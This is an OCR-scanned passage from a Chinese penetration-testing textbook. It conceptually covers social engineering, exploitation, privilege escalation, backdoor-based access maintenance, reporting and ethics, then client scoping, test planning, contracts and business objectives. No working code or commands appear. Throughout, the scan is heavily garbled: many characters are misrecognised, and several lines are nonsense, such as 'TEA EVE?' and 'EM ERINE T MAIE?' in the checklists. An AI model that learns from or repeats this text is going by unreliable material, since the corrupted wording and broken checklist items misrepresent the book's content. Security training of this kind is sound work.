够 仔细 地 检查 任何 已 知 和 未 知 的 漏洞 。 否 则 ， 被 遗漏 的 漏洞 将 会 一 直 
残留 在 目标 网 络 系统 


2.5.6 社会 工程 学 
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要 作用 。 对 目标 组 织 中 的 人 员 进 行 定 回 攻 击 ， 很 有 可 能 帮助 我 们 找到 
渗透 目标 系统 的 入 口 。 例 如 ， 诱 使 用 户 运 行 会 安装 后 门 的 恶意 程序 ， 
束 可 能 为 审计 人 员 的 渗透 工作 形成 突破 。 社 会 工程 学 渗透 分 为 多 种 不 
同 实现 形式 。 伪 小 成 网 络 管理 员 ， 通 过 电话 要 求 用 尸 提 供 目 己 的 账户 
言 息 ， 发 送 钓 鱼 邮 件 来 动 持 用 户 的 银行 账户 ;， 甚 至 是 诱 使 某 人 出 现在 
某 个 地 点 一 一 这 些 都 属于 社会 工程 学 攻击 。 在 社会 工程 学 中 ， 达 成 同 
一 既定 目标 的 实现 方式 应 有 尽 有 。 需要 注意 的 是 ， 在 对 目标 实施 欺骗 
以 达成 渗透 目标 之 前 ， 多 数 情 况 下 需要 长 时 间 人 研究 目标 人 员 的 心理 。 
另外 ， 在 开展 这 个 阶段 的 工作 之 前 ， 您 需要 事先 研究 国内 的 法 律 是 否 
有 关于 社会 工程 学 的 相关 条 球 。 


在 仔细 检查 和 发 现 目 标 系统 中 的 调 洞 之 后 ， 束 可 以 使 用 已 有 的 户 
洞 利用 程序 对 目标 系统 进行 渗透 。 某 些 情况 下 不 得 不 对 漏洞 利用 程序 
(exploit) 进行 额外 的 研究 和 修改 ， 否 则 它 可 能 束 无 法 正常 工作 。 虽 然 
这 听 起 来 就 很 麻烦 ， 但 是 先进 的 漏洞 利用 (修改 ) 工具 可 使 这 项 工作 
容易 得 多 ， 而 且 Kali Linux 已 经 收 示 了 这 种 工具 。 此 外 ， 审 计 人 员 可 以 
把 客户 端 漏洞 利用 程序 和 社会 工程 学 进行 结合 ， 进 而 控制 目标 系统 。 
这 个 阶段 的 主要 任务 是 控制 目标 系统 。 人 整个 流程 可 以 分 为 3 步 ， 涉 及 攻 
击 前 、 攻 击 、 攻 击 后 的 相关 行动 。 

2.5.8 提升 权限 

获取 目标 系统 的 控制 权 是 渗透 成 功 的 标志 。 接 下 来 ， 审 计 人 员 融 
可 以 依据 其 所 拥有 的 访问 权限 ， 在 被 测 系统 中 目 由 发 挥 。 审 计 人 员 也 
可 以 使 用 适用 于 目标 系统 的 本 地 漏洞 来 提升 目 己 的 权限 。 只 要 他 们 能 
够 在 目标 系统 上 运行 提 权 漏洞 利用 程序 ， 束 可 以 获得 主机 上 的 超级 用 
户 权限 或 者 系统 级 权限 。 审 计 人 员 还 可 以 以 该 主机 为 跳板 ， 进 一 步 攻 
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攻击 可 能 是 受 限 制 的 ， 也 可 能 是 不 受 限 的 。 而 后 ， 他 们 很 有 可 能 以 各 
种 方式 获得 与 被 控制 系统 有 关 的 更 多 信息 。 具 体 的 说 ， 他 们 可 能 使 用 
虽 探 手段 截获 网 络 数据 包 ， 破 解 各 种 服务 的 密码 ， 在 局 域 网 络 中 使 用 
网 络 欺 驴 手段 。 所 以 说 ,提升 权限 的 最 终 目 的 是 获得 目标 系统 的 最 高 
访问 权限 。 


2.5.9 访问 维护 

多 数 情况 下 ， 审 计 人 员 需 要 在 一 段 时 间 内 维护 他 们 对 目标 系统 的 
访问 权限 。 例 如 ， 在 演示 越权 访问 目标 系统 的 时 候 ， 安 装 后 门将 节省 
重新 渗透 目标 系统 所 耗费 的 大 量 时 间 。 这 些 情况 下 ， 访 问 维护 将 节约 
获取 目标 系统 访问 权限 所 需要 的 时 间 、 人 花费 和 资源 。 审 计 人 人 员 可 以 通 
过 一 些 秘密 的 通信 隧道 ， 在 既定 时 间 内 维持 对 目标 的 访问 权限 。 这 些 
隧道 往往 基于 特定 协议 、 代 理 或 者 点 对 点 通信 方法 的 后 门 程序 。 这 种 
对 系统 的 访问 方法 可 以 清楚 地 展示 ， 入 侵 人 员 在 目标 系统 实施 攻击 时 
隐匿 行踪 的 具体 方法 。 


2.5.10 告 


在 渗透 测试 的 最 后 一 个 环 下 里 ， 审 计 人 员 要 记录 、 报 各 并 现场 演 
示 那 些 已 经 识别 、 验 证 和 利用 了 的 安全 漏洞 。 被 测 单位 的 管理 和 技术 
团队 会 检查 渗透 时 使 用 的 方法 ， 并 会 根据 这 些 文档 修补 所 有 存在 的 安 
全 漏洞 。 所 以 从 道德 角度 来 看 ， 文 档 报告 的 工作 十 分 重要 。 为 了 帮助 
惯例 人 员 和 技术 人 员 共 同 理 解 、 分 析 当 前 IT 基 础 染 构 中 的 薄弱 环 市 ， 
可 能 需要 给 不 同 的 部 门 撰写 不 同 措辞 的 书面 报告 。 此 外 ， 这 些 报告 还 
可 以 用 来 获取 和 比较 渗透 测试 前 后 目标 系统 的 完整 性 。 


2.6 道德 准则 


专业 的 、 道 德 的 、 经 过 授权 的 安全 测试 服务 ， 离 不 开 由 事先 约定 
的 规则 所 组 成 的 安全 测试 道德 准则 。 这 些 准则 约定 了 安全 测试 服务 的 
服务 方式 、 安 全 实施 的 测试 方法 、 合 同和 谈判 所 约定 的 法 律 条 款 、 测 
试 的 范围 、 测 试 的 准备 、 测 试 的 流程 ， 以 及 报告 结构 的 一 致 性 。 要 顾 
全 上 述 因 素 ， 就 要 仔细 地 考察 、 设 计 在 整个 测试 过 程 中 都 要 遵循 的 正 
规 的 操作 方法 和 相关 流程 。 下 面 将 介绍 一 些 彰 见 的 到 的 准则 。 

e 审计 人 员 不 得 在 和 客户 达成 正式 协议 之 前 对 目标 系统 进行 任何 形 
式 的 渗透 测试 。 这 种 不 道德 的 理 销 方法 有 可 能 破坏 客户 的 正 利 业务 。 
在 某 些 国家 或 地 区 ， 这 种 行为 甚至 可 能 是 违法 行为 。 

e 在 测试 过 程 中 ， 在 没有 得 到 客户 明确 许可 的 情况 下 ， 测 试 人 员 不 
得 进行 超出 测试 范围 越过 已 约定 范畴 的 安全 测试 。 

e 具有 法 律 效 力 的 正式 合同 可 帮助 测试 人 员 避 人 免 承 担 不 必要 的 法 律 
责任 。 正 式 合 同 将 会 约定 哪些 渗透 行为 属于 免责 了 犯 围 。 这 份 合同 必须 
清楚 地 说 明 测 试 的 条 球 和 条 件 、 紧 急 联系 信息 、 工 作 任务 声明 以 及 任 
何 明显 的 利益 冲突 。 

e 测试 人 员 应 当 遵守 测试 计划 所 明确 的 安全 评估 的 时 间 期 限 。 渗 透 
测试 的 时 间 应 当 避 开 正 常生 产业 务 的 时 间 段 ， 以 避免 造成 相互 影响 。 

e 测试 人 员 应 当 遵 循 在 测试 流程 里 约定 的 必要 步骤 。 这 些 规则 以 技 
术 和 管理 不 同 角度 ， 通 过 内 部 环境 和 相关 人 员 来 制约 测试 的 流程 。 

e 在 范围 界定 阶段 ， 应 当 在 合同 书 里 明确 说 明 安 全 评估 业务 涉及 到 
的 所 有 实体 ， 以 及 他 们 在 安全 评估 的 过 程 中 受到 哪些 制约 。 

e 测试 结果 和 书面 报告 必须 清晰 ， 其 顺序 必须 一 致 。 报 告 中 提 及 的 
所 有 已 知 的 和 未 知 的 漏洞 ， 必 须 以 安全 保密 的 方式 递交 给 有 权 碍 看 报 
告 的 相关 责任 人 。 


2.7 本 章 总 结 


本 章 详细 介绍 了 多 种 渗透 测 斌 方法论， 以 及 渗透 测试 的 基本 术 
语 、 相 关 类 型 ， 还 有 这 些 术语 和 业内 其 他 术语 之 间 的 区 别 。 本 章 的 重 
点 内 容 如 下 。 

e 渗透 测试 可 分 为 黑 盒 测 试 和 白 盒 测试 。 黑 盒 测 试 也 称 为 外 部 测 
试 ， 在 墨盒 测试 中 ， 审 计 人 员 事 移 不 了 解 目 标 系统 的 内 部 结构 或 任何 
技术 。 白 盒 测 试 也 叫 内 部 测试 ， 在 白 盒 测试 中 ， 审 计 人 员 了 解 目标 系 
统 的 全 部 细节 。 结 合 黑 盒 测试 和 白 盒 测试 的 测试 类 型 ， 称 做 灰 盒 测 
试 。 

e 脆弱 性 评估 和 渗透 测试 最 基本 的 不 同 点 在 于 : 脆弱 性 评估 中 在 找 
出 目标 系统 中 存在 的 安全 漏洞 ， 并 不 会 去 衡量 这 些 漏洞 可 能 造成 的 相 
应 危害 ;而 渗透 测试 会 进一步 利用 这 些 漏 洞 ， 发 起 实质 性 攻击 以 评估 
它们 可 能 造成 的 安全 问题 。 

e 虽然 业内 有 很 多 安全 测试 方面 的 方法 论 ， 但 是 在 评测 网 络 系统 或 
应 用 程序 安全 性 方面 ， 只 有 极 少 数 的 方法 论 才 能 够 具有 阶段 性 的 循序 
渐进 的 指导 意义 。 本 章 介 绍 了 5 个 非常 有 名 的 开源 安全 评估 方法 论 ， 突 
出 了 它们 的 技术 功能 、 主 要 特征 和 优势 。 这 5 个 方法 论 分 别 是 开源 安全 
测试 方法 论 (OSSTMM) 、 信 息 系 统 安全 评估 框架 (ISSAF) 、 开 放 
式 Web 应 用 程序 安全 项 目 (OWASP) ， 渗 透 测试 执行 标准 (PTES) 以 
及 Web 应 用 安全 联合 威胁 分 类 (WASC-TC) 

e 本 章 还 介绍 了 一 个 简单 的 结构 化 的 通用 测试 方法 论 。 它 由 安全 测 
试行 业 标 准 方法 归纳 而 来 ， 分 为 多 个 标准 化 测试 阶段 。 这 些 阶段 分 
为 : 范围 界定 、 信 息 收集 、 目 标识 别 、 服 务 枚 举 、 漏 洞 映 射 、 社 会 工 
程 学 、 漏 洞 利用 、 提 升 权限 、 访 问 维护 、 文 档 报告 。 

e 最 后 ， 本 章 讨 论 了 在 整个 安全 评估 过 程 中 必须 遵守 的 渗透 测试 道 
德 准则 。 在 安全 评估 的 各 个 阶段 落实 有 关 道 德 准 则 ， 可 以 切实 保障 审 
计 人 员 和 商业 实体 双方 的 各 自 利 益 。 


在 搂 到 一 个 渗透 测试 任务 时 ， 如 何 从 客户 那里 获取 相关 信息 ， 又 
如 何 对 信息 进行 管理 ?请 参见 下 一 章 。 
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第 3 章 范围 界定 


范围 界定 (Target Scoping) 是 收集 被 测 单位 的 评估 项 目 需求 的 经 
验 过 程 。 这 个 阶段 的 工作 把 评估 项 目的 每 一 个 需求 参数 都 落实 到 项 目 
的 测 斌 计划、 限定 因素 、 业 务 指 标 和 进度 安排 中 。 该 流程 由 在 明确 安 
全 评估 项 目的 具体 目标 ， 对 整个 项 目 起 着 举足轻重 的 重要 作用 。 答 明 
确 项 目的 天 键 目标 之 后 ， 评 佑 人 员 就 可 以 整理 出 工作 路 线 图 。 这 份 路 
线 图 会 涵盖 测试 目标 、 测 试 方式、 所 需 资 源 、 限 制 因 素 、 业 务 指标 ， 


以 及 项 目的 计划 和 调度 安排 。 我 们 把 上 述 这 些 要 素 统 称 为 评估 项 目的 
范围 界定 流程 (scope process) 。 本 章 将 介绍 与 之 有 关 的 几 个 概念 ， 分 
别 如 下 。 

e 收集 需求 (gathering client requirements) : 以 口头 交流 或 书面 询 
问 的 形式 ， 积 累 目 标 环境 的 有 关 信 息 。 

e 筹划 工作 (preparing test plan) : 测试 计划 的 准备 工作 受 许 多 因 
素 的 有 影响。 这 些 因 素 包 括 : 结构 化 测试 流程 按照 实际 需求 进行 的 相应 
调整 、 合 同和 协议 、 成 本 分 析 以 及 资源 分 配 。 

e 边界 分 析 (profiling test boundaries) : 明确 渗透 测试 任务 限制 因 
素 的 工作 。 这 些 限制 因素 可 能 米 目 于 技术 上 的 限制 、 信 息 方面 的 限制 
或 者 是 客户 TT 规章 条 例 里 的 有 关 要 求 。 

e 明确 业务 指标 (defining business objectives) : 在 渗透 测试 项 目 
中 ， 该 阶段 工作 使 技术 目标 与 业务 目标 保持 一 致 。 

e 项 目 管理 和 统筹 调度 (project management and scheduling) : 该 
项 工作 下 在 使 渗透 测试 过 程 中 的 每 个 步骤 与 其 他 步骤 形成 时 间 上 的 配 
合 。 很 多 些 先进 的 项 目 管理 工具 ， 都 可 以 用 做 项 目 管理 和 项 目 调 度 的 
ir 

为 了 保证 测试 结果 的 一 致 性 ， 提 高 测试 工作 的 成 功 几 率 ， 强 烈 建 
议 您 遵循 评估 项 目的 艺 围 界定 流程 。 此 外 ， 您 也 可 以 根据 实际 情况 和 
测试 要 素 对 该 流程 进行 调整 。 如 采 脱 离 范围 界定 流程 ， 收 集 到 的 需求 
将 不 够 确切 ， 工 作 的 流程 难以 合理 ， 而 这 都 可 能 会 导致 测试 项 目的 最 
终 失 败 。 这 不 仅 会 危及 整个 渗透 测试 项 目的 成 败 ， 并 有 旦 有 可 能 会 意外 
中 断 被 测 单 位 的 正常 业务 。 充 分 重视 范围 界定 阶段 的 工作 ， 会 给 后 续 
各 阶段 的 工作 带 来 极 大 的 帮助 ， 并 且 有 助 于 明确 技术 方面 和 管理 方面 
的 有 关 需 求 。 范 围 界定 的 关键 在 于 ， 要 在 开始 渗透 之 前 尽 可 能 的 从 客 
户 那里 收集 信息 ， 以 形成 一 个 充分 满足 客户 各 个 层面 需求 的 渗透 测试 
党 略 。 这 一 策略 应 能 顾全 法 律 条 款 、 人 合同 协议 、 资 源 分 配 、 测 试 限 


制 、 核 心 竞 争 力 、 基 础 设施 信息 、 时 间 指 标 以 及 规则 约定 。 渗 透 测试 
的 最 佳 实践 表明 ， 唯 有 遵循 范围 界定 流程 ， 在 这 一 阶段 解决 所 有 必要 
的 问题 ， 才 是 局 动 渗透 测 弃 项 目的 专业 方式 。 

范围 界定 流程 的 各 个 步骤 负 和 贡生 成 不 同类 型 的 信息 。 为 了 保障 渗 
透 测 试 的 最 终 成 功 ， 范 围 界 定 流 程 按 照 逻辑 的 顺序 把 这 些 步骤 有 机 地 
组 合成 一 体 。 我 们 也 要 在 这 个 阶段 尽早 地 处 理 好 与 法 律 有 关 的 问题 。 
在 本 章 后 续 的 小 节 里 ， 我 们 将 详细 解释 这 些 阶段 的 各 个 步骤 。 请 注 
意 ， 如 有 果 能 够 条 例 清 晰 地 整理 好 所 有 收集 到 的 信息 ， 那 么 客户 和 渗透 
测试 顾问 部 能 够 深入 理解 安全 测试 的 工作 过 程 。 


3.1 收集 需求 


这 一 步 通 闸 以 问 着 调查 的 形式 从 客户 那里 收集 目标 基础 设施 的 所 
有 相关 信息 。 接 受 问 卷 调 查 的 对 象 可 以 是 经 被 测 单位 正式 授权 的 个 人 
和 业务 伙伴 。 因 此 ， 要 保证 顺利 完成 渗透 测 斌 项目， 关键 是 要 在 项 目 
的 早期 找到 所 有 内 部 和 外 部 的 干系 人 (stake holder) ， 尽 早 分 析 他 们 对 
项 目的 关注 程度 、 期 望 程度 、 重 要 程度 和 影响 程度 。 然 后 ， 依 据 各 个 
干系 人 的 需求 和 参与 程度 制定 测试 策略 ， 以 在 最 大 限度 地 发 挥 渗透 测 
试 的 正面 影响 的 同时 ， 尽 可 能 地 避免 光 在 的 负面 影响 。 

在 开展 工作 之 前 ， 事 先 验 证 合同 缔约 方 的 真实 身份 是 测试 人 员 的 
责任 ， 而 不 是 被 测 单位 的 黄 任 。 

收集 需求 的 基本 作用 是 : 帮助 渗透 测试 人 员 通 过 真实 可 信 的 渠道 
获取 测试 工作 所 需 的 必要 信息 。 当 完成 明确 需求 的 工作 之 后 ， 应 把 测 
试 需求 分 析 书 交 给 客户 审查 ， 以 免 受 到 错误 信息 的 误导 。 审 查 步 又 可 
以 保证 最 终 测 试 结 来 的 一 致 性 和 完整 性 。 


我 们 整理 出 部 分 常见 问题 ， 这 些 问题 可 以 用 作 常 规 客户 需求 调查 
问卷 的 制作 基础 。 需 要 注意 的 是 ， 您 需要 根据 客户 的 需求 扩展 或 精简 
其 中 的 问题 。 

e 收集 公司 的 基本 信息 ， 例 如 公司 名 称 、 注 册 地 址 、 企 业 网 站 、 联 
络 人 的 详细 资料 、 电 子 邮 件 地 址 以 及 电话 号 码 。 

e 了 解 客户 启动 渗透 测试 项 目的 主要 动机 。 

e 确定 渗透 测试 的 具体 类 型 (包含 或 者 不 包含 特定 标准 ) 。 

o 墨盒 测试 

o 白 盒 测试 

o 外 部 测试 

o 内 部 测试 

o 需要 进行 社会 工程 学 测试 

o 不 进行 社会 工程 学 测试 

o 调查 员工 背景 信息 

o 使 用 伪造 的 员工 信息 进行 测试 (可 能 需要 咨询 律师 ) 

o 进行 DoS (拒绝 服务 攻击 ) 测试 

o 不 进行 DoS 测试 

o 渗透 业务 合作 伙伴 的 系统 

e 测试 项 目 涉及 多 少 服务 器 、 工 作 站 和 网 络 设备 ? 

e 基础 设施 架构 支持 什么 操作 系统 技术 ? 

e 需要 测试 什么 类 型 的 网 络 设备 ? 防火墙、 路由器、 交换机、 调制 
解 调 器 、 负 载 平 衡器 、IDS、IPS， 还 是 其 他 类 型 的 硬件 设备 ? 

e 是 否 有 灾难 恢复 计划 ? 如 果 有 ， 谁 是 测试 人 员 应 当 联 系 的 紧急 联 
系 人 ? 

e 是 否 有 在 岗 的 网 络 管理 员 ? 

e 是 否 需要 遵循 什么 特定 的 工业 标准 ? 如 果 有 ， 请 列 出 来 。 

e 当前 渗透 测试 项 目的 联络 人 是 谁 ? 


e 这 个 项 目的 时 间 周 期 是 多 久 ? 
。 这 个 项 目的 预算 是 多 少 ? 
e 如 果 必 要 ， 应 全 面 掌握 客户 在 其 他 方面 的 需 


P 
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下 述 列 表 是 可 交付 成 果 的 需求 调查 表 (deliverable assessment 
form) 。 这 个 调查 表 的 内 容 并 不 全 面 ， 您 应 该 根据 客户 的 需求 进行 相 
应 添 增 或 删 减 。 

e 您 期 望 得 到 哪 种 类 型 的 报告 ? 

o 执行 报告 

o 技术 评估 报告 

o 开发 人 员 报 告 

e 您 布 望 项 目 报告 采用 哪 种 文件 格式 ” PDF ` HTML 还 是 DOC 。 

是 交 报 告 的 方式 ， 应 当 是 加 密 邮 件 还 是 纸 质 文 档 ? 

人 TEA EVE? 

o AL 

o 股东 

OTRA 

这 种 简洁 而 全 面 的 调查 表 ， 有 助 您 宫 不 费力 地 掌握 客户 的 需求 ， 
有 助 于 顺利 完成 测试 计划 。 


3.2 筹划 工作 


在 收集 完 客 户 需求 并 由 客户 验证 过 这 些 需求 之 后 ， 融 可 开始 正式 
测试 计划 的 准备 工作 。 测 试 计划 必须 能 够 反映 客户 的 全 部 需求 ， 应 能 
全 面 解决 测试 工作 在 法 律 和 商业 领域 会 涉及 的 各 种 问题 。 筹 划 测 试 工 
作 的 有 天 计划 ， 关 键 古 要 制定 一 种 疗 刘 的 测试 流程 ， 解 决 好 人 员 配 


置 、 成 本 分 析 、 保 密 协 议 、 渗 透 测 试 合同 以 及 操作 规则 的 问题 。 下 面 
将 具体 讨论 这 些 方面 的 工作 。 

e 制定 产 齐 的 测试 流程 : 在 分 析 完 客户 反馈 风 详 细 资 料 之 后 ， 您 可 
能 需要 适度 调整 现 有 的 测试 方法 论 。 例 如， 如 果 客 户 不 希望 进行 社会 
工程 学 测试 ， 那 么 正式 的 测试 流程 束 不 得 有 该 项 测试 。 有 些 人 把 这 种 
调整 工作 称 为 测试 过 程 验证 (Test Process Validation) 。 这 种 调整 工作 
往往 需要 进行 多 次 ; 每 当 客 户 改 动 了 他 们 的 需求 ， 测 试 人 员 都 需要 重 
新 进行 相应 的 调整 工作 。 如 果 测 试 计划 里 包含 任何 客户 需求 范围 之 外 
的 测试 ， 将 有 可 能 违反 单位 的 制度 ， 甚 至 造成 严重 后 果 。 上 此外， 测试 
人 员 通 党 还 要 按照 测试 类 型 的 区 别 对 测试 法 程 进行 一 定 的 调整 。 例 
如 ， 白 盒 测 试 的 测试 计划 残 不 应 该 包含 信息 收集 和 目标 识别 的 相关 阶 
段 ， 因 为 测试 人 员 事 前 能 够 掌握 目标 内 部 架构 的 详细 情况 。 

无 论 进行 何 种 类 型 的 测试 ， 测试 人 员 都 应 当 验 证 网 络 信 息 和 实际 
环境 。 毕 竟 ， 客 户 自 己 可 能 并 不 知道 他 们 的 网 络 结构 到 底 是 什么 情 
ith o 

e 人 员 配 置 : 测试 人 员 的 知识 结构 和 专业 水 准 是 影响 测试 工作 成 败 
的 重要 因素 之 一 。 因 此 ， 为 既定 任务 指定 一 名 水 平 相当 的 专业 渗透 测 
试 人 员 ， 可 提高 安全 评估 结果 的 质量 。 例 如 ， 要 开展 针对 应 用 程序 的 
渗透 任务 ， 我 们 就 需要 应 用 安全 方面 的 测试 人 员 。 这 项 工作 对 于 渗透 
测试 任务 的 成 功 完 成 具有 非常 重要 的 作用 。 

e 成 本 分 析 : 渗透 测试 的 成 本 取决 于 很 多 因素 。 可 能 影响 成 本 的 
素 包 括 : 分 配给 整个 项 目的 天 数 、 客 户 要 求 的 额外 服务 (如 社会 工程 
学 和 物理 安全 评估 ) 、 评 估 特 定 技术 所 要 求 的 专业 能 力 。 以 行业 的 观 
点 来 看 ， 成 本 取决 于 测试 项 目的 性 质 (种 类 ) 和 数量 (工作 量 ) 。 

e 保密 协议 (Non-disclosure Agreement, NDA) : 在 渗透 测试 开始 
之 前 ， 合 同 双方 需要 签订 符合 双方 利益 的 协议 。 这 份 保 密 协 议 用 来 明 
确 测试 工作 中 各 方 应 该 遵循 的 条 球 和 条 件 。 在 整个 测试 过 程 中 ， 渗 透 


测试 人 员 必 须 遭 守 这 些 条 款 。 违 反 保 密 协 议 任何 条 例 的 责任 人 都 将 受 
到 严惩 ， 甚 可 能 因此 失去 工作 。 

e 渗透 测试 合同 : 客户 和 渗透 测试 人 员 之 间 的 所 有 技术 事宜 和 业务 
事宜 ， 都 应 落实 为 书面 合同 。 这 类 合同 主要 约定 测试 服务 的 具体 内 
容 、 服 务 的 主要 目标 、 测 斌 方法、 收费 标准 ， 虽 在 维护 整个 项 目的 保 
密 性 。 因 为 这 种 合同 全 面 影响 您 的 渗透 测试 活动 ， 所 以 建议 您 聘请 专 
业 律 师 或 法 律 顾问 起 章 这 类 合同 。 

e 操作 规则 ， 因 为 渗透 测试 可 能 形成 实质 性 的 攻击 ， 所 以 测试 人 员 
必须 清楚 地 理解 评估 的 需求 、 客 户 配 合 的 范围 ， 以 及 每 种 评估 技术 可 
能 会 造成 的 影响 或 后 琳 。 此 外 ， 渗 透 测 斌 涉及 的 测试 工具 必须 配 有 了 明 
确 的 用 途 说 明 ， 以 便 测 试 人 员 可 进行 相应 的 选择 。 操 作 规则 非常 详细 
地 明确 了 上 述 所 有 内 容 ， 是 测试 人 员 在 测试 过 程 中 必须 避 循 的 技术 规 
范 。 这 一 规则 的 制定 依据 是 事先 测算 好 的 资产 收益 率 (ROE) 。 测 试 
人 员 不 得 越过 该 规则 所 明确 的 行为 弄 限 。 

通过 测试 计划 的 上 述 各 项 准备 工作 ， 您 能 够 保证 渗透 测试 流程 的 
统一 性 。 这 也 有 助 于 测试 人 员 依 据 客户 需求 确定 出 评估 计划 里 的 更 多 
细节 。 我 们 同时 建议 您 事先 准备 好 测试 计划 检查 清单 ， 以 验证 评 信 条 
TAA KIAMA ° 

测试 计划 检查 清单 

在 开始 范围 界定 的 后 续 工 作 之 前 ， 应 当 检查 一 下 您 是 否 完成 了 先 
前 阶段 的 任务 。 此 时 ， 您 可 以 参考 下 述 这 个 清单 。 

e 是 否 满足 了 客户 需求 建议 书 (REP) 的 所 有 需求 ? 

e 宇 否 清晰 地 摘 述 了 测试 范围 ? 


e 足 否 已 经 明确 了 所 有 参与 测试 的 有 关 单 位 ? 
e 宇 否 已 经 单独 列 出 了 所 有 不 参与 测试 的 单位 ? 
e 是 否 需 要 遵循 特定 的 测试 流程 ? 

e EM ERINE T MAIE? 


e 测试 完成 后 能 否 交 付 相 应 的 预期 成 采 ? 

e 宇 否 书面 措 述 、 人 研究 过 整个 测试 环境 ? 

e 足 否 给 所 有 的 测试 项 目 部 制定 了 相应 的 角色 和 职责 ? 

e 在 涉及 特定 技术 的 评估 工作 中 ， 是 否 会 涉及 第 三 方 承 包 丙 ? 
e 有 没有 采取 让 项 目 能 够 完美 结束 的 措施 ? 

e 对 方 是 否 有 灾难 恢复 计划 ? 

e 宇 否 已 经 正式 测算 过 整个 项 目的 成 本 ? 

e 是 否 已 经 找到 了 批准 测试 计划 的 责任 人 ? 

e 宇 否 已 经 找到 了 接受 渗透 测 弃 的 责任 人 ? 


3.3 测试 边界 分 析 


客户 提出 的 项 目 需求 ， 可 能 有 意 或 无 意 地 提示 出 被 测 环境 的 局 限 
条 件 和 测试 边界 。 这 些 局 限 条 件 和 测试 边界 ， 可 分 为 技术 上 的 、 知 识 
上 的 或 者 由 客户 设 定 的 正规 限制 。 因 为 这 些 约束 条 件 可 能 会 对 测试 造 
成 重大 影响 ， 所 以 测试 人 员 得 通过 其 他 可 行 方案 规避 这 些 问题 。 必 须 
注意 的 是 ， 有 些 限制 是 无 法 通融 或 修改 的 ， 因 为 客户 要 通过 这 些 限制 
来 管控 整个 渗透 测试 的 过 程 。 下 文 将 会 介绍 第 见 的 限制 类 型 和 相应 的 
案例 。 

e 技术 限制 : 在 定义 了 合适 的 测试 边界 之 后 ， 审 计 人 员 可 能 发 现 目 
标 网 络 基础 设施 中 使 用 了 一 种 无 法 测试 的 新 型 技术 ， 这 种 类 型 的 限制 
就 是 拉 术 限制 。 发 生 这 种 情况 的 原因 是 缺乏 评估 这 种 新 技术 的 渗透 测 
试 工具 。 例 如 ，XYZ 公 司 引 进 了 一 款 性 能 优异 的 GZ 型 网 络 防 火 墙 ， 他 
们 把 GZ 部 绪 在 网 络 入 口 以 你 扩 整 个 内 部 网 络 。 然 而 ，GZ 防 火 墙 运 用 的 
专利 技术 ， 导 致 了 现 有 的 任何 一 丈 防 火 墙 评 估 工 具 都 无 法 评 信 该 产 
品 。 因 此 ， 测 试 单位 需要 及 时 更 新 解决 方案 ， 以 解决 新 技术 之 来 的 评 
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e 知识 限制 :渗透 测试 人 员 在 知识 能 力 方面 的 局 限 会 对 整个 项 目 产 
生 人 负面 影响。 例如 ， 专 门 从 事 数 据 库 渗透 的 测试 人 员 ， 无 法 负责 网 络 
基础 设施 的 物理 安全 评 佑 。 因 此 ， 为 了 顺利 完成 项 目 任务 , 最 好 能 够 依 
据 人 员 的 知识 结构 和 技能 水 平分 配 他 们 相应 的 角色 和 职责 。 

e 基础 设施 有 关 的 其 他 方面 的 限制 : 为 了 控制 评 佑 的 实施 过 程 ， 客 
尸 也 可 能 会 添加 特定 的 测试 限制 。 为 了 实现 这 种 控制 ， 他 们 可 能 会 限 
制 测试 人 员 仅 接触 那些 需要 被 评估 的 网 络 设备 和 技术 ， 而 不 让 他 们 接 
触 TT 基础 设施 的 其 他 部 分 。 通 常 ， 需 求 收 集 阶段 的 工作 应 能 明确 这 些 
限制 。 例 如 ， 客 户 可 能 会 要 求 测试 网 段 A 里 的 所 有 设备 ， 但 是 他 们 还 会 
同时 要 求 不 得 测试 第 一 个 路 由 器 。 客 户 需求 里 的 这 种 限制 ， 会 无 法 衡 
量 第 一 个 路 由 器 的 安全 性 ， 即 使 彻底 检查 了 网 络 里 的 其 他 所 有 设备 并 
保证 了 其 安全 ， 还 是 这 个 路 由 器 的 问题 很 有 可 能 引发 整个 网 络 的 安全 
事故 。 因 此， 在 接受 这 类 限制 之 前 ， 必 须 认 真 地 考虑 全 局 问题 。 

评估 人 员 务 必 在 用 户 需 求 收 集 阶段 ， 仔 细 观 察 、 深 入 分 析 所 有 的 
局 限 条 件 和 限制 要 求 。 优 秀 的 渗透 测试 人 员 应 能 仔细 分 辨 每 一 个 相关 
需求 ， 应 能 与 客户 进行 讨论 ， 取 消 或 者 改变 所 有 可 能 造成 测试 流程 意 
外 中 断 ， 或 者 造成 测试 结 琳 卜 义 的 限制 。 虽 然 本 质 上 说 ， 无 法 规避 茶 
些 技术 上 的 限制 ， 而 且 需 要 额外 的 时 间 来 开发 克服 相应 限制 的 测试 方 
案 ， 但 是 引入 高 水 平 的 测试 人 员 ， 使 用 先进 的 测试 工具 和 技术 ， 也 可 
能 克服 这 些 限制 。 


3.4 定义 业务 指标 


在 明确 评 信和 需求 和 签署 服务 协议 之 后 ， 下 一 步 工 作 就 是 定义 业务 
指标 。 这 将 保证 测试 结果 能 够 给 客 尸 的 业务 市 来 各 个 方面 的 好 处 。 
一 项 业务 指标 都 对 应 着 相应 的 评估 需求 ， 把 安全 评估 的 成 果 展 现 为 业 
务 的 业绩 。 我 们 整理 出 一 些 普 所 适用 于 各 类 渗透 测试 项 目的 业务 指 


标 。 然 而 ， 您 也 可 能 根据 客户 的 需求 重新 设计 这 份 清单 。 这 个 工作 十 
分 重要 ， 审 计 人 员 应 当 能 够 观察 、 理 解 客 户 的 业务 出 发 点 ， 在 测试 
前 、 测 斌 中、 测试 后 都 满足 最 低 程度 的 指标 。 管 理 团 队 和 技术 团队 通 
力 合作 ， 以 保证 业务 可 靠 性 为 命题 ， 以 增强 信息 系统 安全 性 为 着 手 
点 ， 共 同 制定 业务 指标 。 无 论 何 种 类 型 的 安全 评 佑 项目， 均 可 参考 下 
述 这 个 通用 的 业务 指标 。 

e 通过 常规 安全 检查 ， 提 高 企业 形象 和 业内 认可 程度 。 

e 以 保证 业务 完整 性 为 契机 ， 达 到 必要 的 标准 和 规范 。 

e 提高 在 有 客户 、 员 工 和 其 他 业务 单位 信息 的 机 要 系统 的 安全 性 。 

e 在 网 络 基 础 设施 中 排查 现 有 的 威胁 和 已 知 漏洞 ， 协 助 建立 安全 制 
度 以 及 可 对 抗 已 知 和 未 知 风险 的 工作 流程 。 

e 壹 供 一 个 可 平 请 过 流 的 、 健 全 的 业务 组 织 如 构 ， 从 而 使 合作 伙伴 
和 窗户 能 够 受 花 。 

e 把 维护 TT 基础 设施 安全 性 的 费用 降 到 最 低 。 安 全 评估 业务 可 衡 
量 业务 系统 的 保密 性 、 完 整 性 和 可 用 性 。 

